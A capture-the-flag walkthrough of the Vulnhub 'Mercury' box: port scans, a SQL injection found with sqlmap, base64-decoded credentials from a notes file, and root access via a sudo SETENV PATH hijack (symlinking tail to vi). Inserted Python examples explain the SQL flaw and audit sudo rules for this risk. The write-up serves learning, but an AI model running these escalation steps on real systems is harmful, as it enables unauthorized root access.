
mercury

Initial reconnaissance

After the earlier [[narak]] box I now pay much more attention to UDP scans.
Host discovery
After switching the VM to NAT mode and rebooting, the host still could not be found.
[screenshot]
So I looked it up.
Fix for the host not showing up: [[Vulnhub靶机检测不到IP地址|Vulnhub box has no detectable IP address]]
After the fix:
[screenshot]
Regular port scan
[screenshot]
Deep port scan
(honestly, the length of the output scared me a bit)

┌──(kali㉿kali)-[~/mercury]
└─$ sudo nmap -sT -sV -sC -O -p22,8080 192.168.92.135 -oA mercury
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-23 05:44 EDT
Nmap scan report for 192.168.92.135
Host is up (0.00043s latency).

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 c8:24:ea:2a:2b:f1:3c:fa:16:94:65:bd:c7:9b:6c:29 (RSA)
|   256 e8:08:a1:8e:7d:5a:bc:5c:66:16:48:24:57:0d:fa:b8 (ECDSA)
|_  256 2f:18:7e:10:54:f7:b9:17:a2:11:1d:8f:b3:30:a5:2a (ED25519)
8080/tcp open  http-proxy WSGIServer/0.2 CPython/3.8.2
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
|_http-server-header: WSGIServer/0.2 CPython/3.8.2
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 404 Not Found
|     Date: Mon, 23 Oct 2023 09:44:22 GMT
|     Server: WSGIServer/0.2 CPython/3.8.2
|     Content-Type: text/html
|     X-Frame-Options: DENY
|     Content-Length: 2366
|     X-Content-Type-Options: nosniff
|     Referrer-Policy: same-origin
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta http-equiv="content-type" content="text/html; charset=utf-8">
|     <title>Page not found at /nice ports,/Trinity.txt.bak</title>
|     <meta name="robots" content="NONE,NOARCHIVE">
|     <style type="text/css">
|     html * { padding:0; margin:0; }
|     body * { padding:10px 20px; }
|     body * * { padding:0; }
|     body { font:small sans-serif; background:#eee; color:#000; }
|     body>div { border-bottom:1px solid #ddd; }
|     font-weight:normal; margin-bottom:.4em; }
|     span { font-size:60%; color:#666; font-weight:normal; }
|     table { border:none; border-collapse: collapse; width:100%; }
|     vertical-align:
|   GetRequest, HTTPOptions: 
|     HTTP/1.1 200 OK
|     Date: Mon, 23 Oct 2023 09:44:22 GMT
|     Server: WSGIServer/0.2 CPython/3.8.2
|     Content-Type: text/html; charset=utf-8
|     X-Frame-Options: DENY
|     Content-Length: 69
|     X-Content-Type-Options: nosniff
|     Referrer-Policy: same-origin
|     Hello. This site is currently in development please check back later.
|   RTSPRequest: 
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|     "http://www.w3.org/TR/html4/strict.dtd">
|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 400</p>
|     <p>Message: Bad request version ('RTSP/1.0').</p>
|     <p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p>
|     </body>
|_    </html>
| http-robots.txt: 1 disallowed entry 
|_/
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
MAC Address: 00:0C:29:3B:94:8D (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.71 seconds

UDP scan
[screenshot]
Only port 68 was found open.

Script scan
[screenshot]

Trying port 8080

[screenshot]
Nothing there, so next:

Directory scan

[screenshot]
Tried robots.txt and found nothing.
[screenshot]
[screenshot]
At this point I was out of ideas.

The next step was to look up some reference material.

The write-ups say to check whether DEBUG is enabled by requesting an arbitrary non-existent URL.
[screenshot]
The third entry looks like a directory; try it.
[screenshot]
Just a picture of the moon and two buttons.

Try them
[screenshot]
[screenshot]
That is all there is.

But the write-ups say that

http://192.168.92.135:8080/mercuryfacts/3/

has a SQL injection.

SQL injection

So try sqlmap
[screenshot]
Got the users.
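As an added example (not code from the box or from the original post), the bug class behind the injectable /mercuryfacts/<id>/ route: the id taken from the URL is formatted straight into an SQLite query, shown next to the parameterized form that closes the hole. The table name, columns and rows are constructed stand-ins; the box's real Django source is not reproduced here.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the box's db.sqlite3 (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE facts (id INTEGER PRIMARY KEY, fact TEXT)")
    conn.executemany("INSERT INTO facts VALUES (?, ?)", [
        (1, "Mercury is the smallest planet."),
        (2, "Mercury has no moons."),
        (3, "A year on Mercury lasts 88 Earth days."),
    ])
    return conn


def fact_vulnerable(conn, fact_id):
    """The pattern sqlmap finds: the path segment is spliced into the SQL text,
    so a value such as '3 OR 1=1' rewrites the WHERE clause instead of being data."""
    sql = "SELECT fact FROM facts WHERE id = %s" % fact_id
    return [row[0] for row in conn.execute(sql)]


def fact_safe(conn, fact_id):
    """Hardened form: reject anything that is not an integer, then bind the value
    as a parameter so the database never parses it as SQL. In Django the same
    applies to cursor.execute(sql, [fact_id]) or Fact.objects.filter(id=fact_id)."""
    try:
        fact_id = int(fact_id)
    except (TypeError, ValueError):
        return []
    rows = conn.execute("SELECT fact FROM facts WHERE id = ?", (fact_id,))
    return [row[0] for row in rows]


if __name__ == "__main__":
    db = make_db()
    for route_value in ("3", "3 OR 1=1"):
        print(route_value, "->", fact_vulnerable(db, route_value), "|", fact_safe(db, route_value))
```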

Only SSH is left to use.

Try an SSH connection

[screenshot]
It was only the very last one I tried that let me in.

(honestly, by that point I had almost given up)
[screenshot]

Got the first flag.

Next, privilege escalation

sudo shell-script privilege escalation

┌──(kali㉿kali)-[~/redteamnotes/mercury]
└─$ sudo ssh webmaster@192.168.92.135
[sudo] kali 的密码:
The authenticity of host '192.168.92.135 (192.168.92.135)' can't be established.
ED25519 key fingerprint is SHA256:mHhkDLhyH54cYFlptygnwr7NYpEtepsNhVAT8qzqcUk.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.92.135' (ED25519) to the list of known hosts.
webmaster@192.168.92.135's password: 
Permission denied, please try again.
webmaster@192.168.92.135's password: 
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-45-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Wed  8 Nov 13:34:22 UTC 2023

  System load:  0.06              Processes:              196
  Usage of /:   70.7% of 4.86GB   Users logged in:        0
  Memory usage: 27%               IPv4 address for ens33: 192.168.92.135
  Swap usage:   0%

 * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
   just raised the bar for easy, resilient and secure K8s cluster deployment.

   https://ubuntu.com/engage/secure-kubernetes-at-the-edge

381 updates can be installed immediately.
267 of these updates are security updates.
To see these additional updates run: apt list --upgradable

The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Mon Oct 23 13:26:49 2023 from 192.168.92.130
webmaster@mercury:~$ whoami
webmaster
webmaster@mercury:~$ uname -a
Linux mercury 5.4.0-45-generic #49-Ubuntu SMP Wed Aug 26 13:38:52 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
webmaster@mercury:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:0c:29:43:38:cf brd ff:ff:ff:ff:ff:ff
    inet 192.168.92.135/24 brd 192.168.92.255 scope global dynamic ens33
       valid_lft 1388sec preferred_lft 1388sec
    inet6 fe80::20c:29ff:fe43:38cf/64 scope link 
       valid_lft forever preferred_lft forever
webmaster@mercury:~$ ls
mercury_proj  user_flag.txt
webmaster@mercury:~$ cd mercury_proj/
webmaster@mercury:~/mercury_proj$ ls
db.sqlite3  mercury_facts  mercury_proj
manage.py   mercury_index  notes.txt
webmaster@mercury:~/mercury_proj$ cat notes.txt
Project accounts (both restricted):
webmaster for web stuff - webmaster:bWVyY3VyeWlzdGhlc2l6ZW9mMC4wNTZFYXJ0aHMK
linuxmaster for linux stuff - linuxmaster:bWVyY3VyeW1lYW5kaWFtZXRlcmlzNDg4MGttCg==
webmaster@mercury:~/mercury_proj$ echo bWVyY3VyeW1lYW5kaWFtZXRlcmlzNDg4MGttCg== | base64 -d
mercurymeandiameteris4880km
webmaster@mercury:~/mercury_proj$ su linuxmaster
Password: 
linuxmaster@mercury:/home/webmaster/mercury_proj$ whoami
linuxmaster
linuxmaster@mercury:/home/webmaster/mercury_proj$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:0c:29:43:38:cf brd ff:ff:ff:ff:ff:ff
    inet 192.168.92.135/24 brd 192.168.92.255 scope global dynamic ens33
       valid_lft 1250sec preferred_lft 1250sec
    inet6 fe80::20c:29ff:fe43:38cf/64 scope link 
       valid_lft forever preferred_lft forever
linuxmaster@mercury:/home/webmaster/mercury_proj$ ls
db.sqlite3  mercury_facts  mercury_proj
manage.py   mercury_index  notes.txt
linuxmaster@mercury:/home/webmaster/mercury_proj$ cd
linuxmaster@mercury:~$ sudo -l
[sudo] password for linuxmaster: 
Matching Defaults entries for linuxmaster on mercury:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User linuxmaster may run the following commands on mercury:
    (root : root) SETENV: /usr/bin/check_syslog.sh
linuxmaster@mercury:~$ cat /usr/bin/check_syslog.sh 
#!/bin/bash
tail -n 10 /var/log/syslog
linuxmaster@mercury:~$ ln -s /bin/vi tail
linuxmaster@mercury:~$ ls -liah
total 24K
162165 drwx------ 3 linuxmaster linuxmaster 4.0K Nov  8 13:38 .
    18 drwxr-xr-x 5 root        root        4.0K Aug 28  2020 ..
165762 lrwxrwxrwx 1 linuxmaster linuxmaster    9 Sep  1  2020 .bash_history -> /dev/null
165896 -rw-r--r-- 1 linuxmaster linuxmaster  220 Aug 28  2020 .bash_logout
162221 -rw-r--r-- 1 linuxmaster linuxmaster 3.7K Aug 28  2020 .bashrc
165920 drwx------ 2 linuxmaster linuxmaster 4.0K Aug 28  2020 .cache
166244 -rw-r--r-- 1 linuxmaster linuxmaster  807 Aug 28  2020 .profile
162215 lrwxrwxrwx 1 linuxmaster linuxmaster    7 Nov  8 13:38 tail -> /bin/vi
linuxmaster@mercury:~$ export PATH=.:$PATH
linuxmaster@mercury:~$ echo $PATH
.:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games
linuxmaster@mercury:~$ sudo --preserve-env=PATH /usr/bin/check_syslog.sh 
2 files to edit
root@mercury:/home/linuxmaster# whoami
root
root@mercury:/home/linuxmaster# uname -a
Linux mercury 5.4.0-45-generic #49-Ubuntu SMP Wed Aug 26 13:38:52 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
root@mercury:/home/linuxmaster# ls
tail
root@mercury:/home/linuxmaster# cd
root@mercury:~# ls
root_flag.txt
root@mercury:~# cat root_flag.txt 
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@/##////////@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@(((/(*(/((((((////////&@@@@@@@@@@@@@
@@@@@@@@@@@((#(#(###((##//(((/(/(((*((//@@@@@@@@@@
@@@@@@@@/#(((#((((((/(/,*/(((///////(/*/*/#@@@@@@@
@@@@@@*((####((///*//(///*(/*//((/(((//**/((&@@@@@
@@@@@/(/(((##/*((//(#(////(((((/(///(((((///(*@@@@
@@@@/(//((((#(((((*///*/(/(/(((/((////(/*/*(///@@@
@@@//**/(/(#(#(##((/(((((/(**//////////((//((*/#@@
@@@(//(/((((((#((((#*/((///((///((//////(/(/(*(/@@
@@@((//((((/((((#(/(/((/(/(((((#((((((/(/((/////@@
@@@(((/(((/##((#((/*///((/((/((##((/(/(/((((((/*@@
@@@(((/(##/#(((##((/((((((/(##(/##(#((/((((#((*%@@
@@@@(///(#(((((#(#(((((#(//((#((###((/(((((/(//@@@
@@@@@(/*/(##(/(###(((#((((/((####/((((///((((/@@@@
@@@@@@%//((((#############((((/((/(/(*/(((((@@@@@@
@@@@@@@@%#(((############(##((#((*//(/(*//@@@@@@@@
@@@@@@@@@@@/(#(####(###/((((((#(///((//(@@@@@@@@@@
@@@@@@@@@@@@@@@(((###((#(#(((/((///*@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@%#(#%@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

Congratulations on completing Mercury!!!
If you have any feedback please contact me at SirFlash@protonmail.com
[root_flag_69426d9fda579afbffd9c2d47ca31d90]
root@mercury:~#
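The escalation above works because the sudo rule carries the SETENV tag and check_syslog.sh calls tail by bare name, so the PATH handed over with --preserve-env decides which tail runs as root. As an added example (not from the walkthrough or the box), a small audit that parses sudo -l output for SETENV rules and flags commands a script resolves through PATH; the sample strings are constructed in the shape of the output shown above, and the hardened script is an assumed fix.

```python
import re
import shlex
# Constructed samples shaped like the sudo -l output and script shown above.
SUDO_L_OUTPUT = r"""Matching Defaults entries for linuxmaster on mercury:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User linuxmaster may run the following commands on mercury:
    (root : root) SETENV: /usr/bin/check_syslog.sh
"""
VULNERABLE_SCRIPT = "#!/bin/bash\ntail -n 10 /var/log/syslog\n"
# Assumed fix (not the box's): pin PATH inside the script and call tail by absolute path.
HARDENED_SCRIPT = "#!/bin/bash\nPATH=/usr/bin:/bin\n/usr/bin/tail -n 10 /var/log/syslog\n"

# "(runas) TAG: TAG: command" as printed by sudo -l; the tag list may be empty.
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s+(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$")
BUILTINS = {"cd", "echo", "exit", "export", "set", "if", "then", "else", "fi", "for", "do", "done"}

def setenv_rules(sudo_l_text):
    """(runas, command) pairs whose rule carries the SETENV tag (NOSETENV does not count)."""
    rules = []
    for line in sudo_l_text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t.strip() for t in m.group("tags").split(":")}
        if "SETENV" in tags:
            rules.append((m.group("runas").strip(), m.group("cmd").strip()))
    return rules

def relative_commands(script_text):
    """Command names the script invokes by bare name, i.e. resolved through PATH."""
    found = []
    for line in script_text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        for segment in re.split(r"\|\||&&|\||;", line):
            words = shlex.split(segment)
            while words and re.match(r"^[A-Za-z_]\w*=", words[0]):
                words.pop(0)  # skip leading VAR=value assignments such as PATH=...
            if words and not words[0].startswith("/") and words[0] not in BUILTINS:
                found.append(words[0])
    return found

def path_hijack_risk(sudo_l_text, script_text):
    # SETENV lets the caller supply PATH to the script, so every bare command name is caller-chosen.
    return bool(setenv_rules(sudo_l_text)) and bool(relative_commands(script_text))

if __name__ == "__main__":
    print(setenv_rules(SUDO_L_OUTPUT), relative_commands(VULNERABLE_SCRIPT), relative_commands(HARDENED_SCRIPT))
```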

Done, wrapping up.

http://www.jsqmd.com/news/338598/
